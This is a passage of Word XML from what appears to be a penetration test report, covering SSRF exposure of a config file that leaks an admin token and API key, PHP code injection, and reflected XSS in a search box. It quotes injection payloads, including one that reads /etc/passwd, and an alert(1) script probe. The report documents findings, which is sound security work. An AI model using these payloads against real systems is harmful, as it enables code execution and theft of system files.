        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="136" w:name="paragraph78"/>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource78"</w:instrText>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00736606" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.59</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
      <w:r w:rsidR="00736606"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The scan revealed open ports 631 and 8081. Port 631 exposed the default CUPS interface, while port 8081 returned a generic “not found” message, indicating hidden endpoints</w:t>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="137" w:name="paragraph79"/>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource79"</w:instrText>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.60</w:t>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:bookmarkStart w:id="138" w:name="paragraph80"/>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource80"</w:instrText>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.61</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
      <w:r w:rsidR="000224B3"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Further fuzzing of port 8081 uncovered /config.txt, which disclosed sensitive configuration data, including an admin token and an API key</w:t>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="139" w:name="paragraph81"/>
      <w:r w:rsidR="00CE32E5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00CE32E5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource81"</w:instrText>
      </w:r>
      <w:r w:rsidR="00CE32E5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00CE32E5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.62</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
      <w:r w:rsidR="00CE32E5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:bookmarkStart w:id="140" w:name="paragraph82"/>
      <w:r w:rsidR="00CE32E5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00CE32E5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource82"</w:instrText>
      </w:r>
      <w:r w:rsidR="00CE32E5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00CE32E5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="000224B3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A.63</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
      <w:r w:rsidR="00CE32E5"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This confirmed a working SSRF vulnerability with internal information exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01295114" w14:textId="006B50D2" w:rsidR="007A7549" w:rsidRPr="00D77DFE" w:rsidRDefault="00545188" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_Toc223521133"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00EB2714" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DD5501" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A7549" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Template Renderer Functionality and Server</w:t>
      </w:r>
      <w:r w:rsidR="007A7549" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>Side Template Injection (SSTI) Exposure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w14:paraId="3BA685C5" w14:textId="453C967E" w:rsidR="00395410" w:rsidRPr="00D77DFE" w:rsidRDefault="00D43892" w:rsidP="009C6B75">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The Template Renderer displays user input in a welcome message. During input testing, the sequence "; // was accepted without sanitisation</w:t>
      </w:r>
      <w:r w:rsidR="0044517B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="142" w:name="paragraph83"/>
      <w:r w:rsidR="0044517B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0044517B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource83"</w:instrText>
      </w:r>
      <w:r w:rsidR="0044517B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="0044517B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0044517B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.64</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
      <w:r w:rsidR="0044517B"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indicating that the application was interpreting the input in an executable context.</w:t>
      </w:r>
      <w:r w:rsidR="0044517B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">A payload such as </w:t>
      </w:r>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Alice"; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>phpinfo(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>); //</w:t>
      </w:r>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>executed server</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t xml:space="preserve">side PHP code, confirming </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>a  SSTI</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability</w:t>
      </w:r>
      <w:bookmarkStart w:id="143" w:name="paragraph84"/>
      <w:r w:rsidR="0044517B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:hyperlink w:anchor="resource84" w:history="1">
        <w:r w:rsidR="0044517B" w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          </w:rPr>
          <w:t>Figure A.65</w:t>
        </w:r>
        <w:bookmarkEnd w:id="143"/>
      </w:hyperlink>
      <w:r w:rsidR="009D4A0A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Appendix A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0044517B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The flaw also enabled arbitrary file retrieval; for example, </w:t>
      </w:r>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Alice"; echo file_get_contents("/etc/passwd"); //</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> returned the server’s </w:t>
      </w:r>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>contents</w:t>
      </w:r>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="144" w:name="paragraph85"/>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource85"</w:instrText>
      </w:r>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.66</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
      <w:r w:rsidR="003A258B"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w:t>
      </w:r>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This demonstrates that the component fails to validate user input and is vulnerable to full arbitrary PHP code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15849716" w14:textId="77777777" w:rsidR="000635BE" w:rsidRPr="00D77DFE" w:rsidRDefault="000635BE" w:rsidP="003A258B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110A6E17" w14:textId="46068A18" w:rsidR="00C62EBA" w:rsidRPr="00D77DFE" w:rsidRDefault="00545188" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_Toc223521134"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00EB2714" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DD5501" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C794E" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Search Function Input Handling and Reflected Cross</w:t>
      </w:r>
      <w:r w:rsidR="008C794E" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>Site Scripting (XSS) Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
    </w:p>
    <w:p w14:paraId="633A6AAD" w14:textId="16E9B997" w:rsidR="00FE7E01" w:rsidRPr="00D77DFE" w:rsidRDefault="008F2EC9" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The application’s search function was found to be vulnerable to Reflected XSS. Submitting &lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>/script&gt; triggered JavaScript execution in the browser, confirming</w:t>
      </w:r>
      <w:r w:rsidR="00FE7E01" w:rsidRPr="00D77DFE">
        <w:rPr>
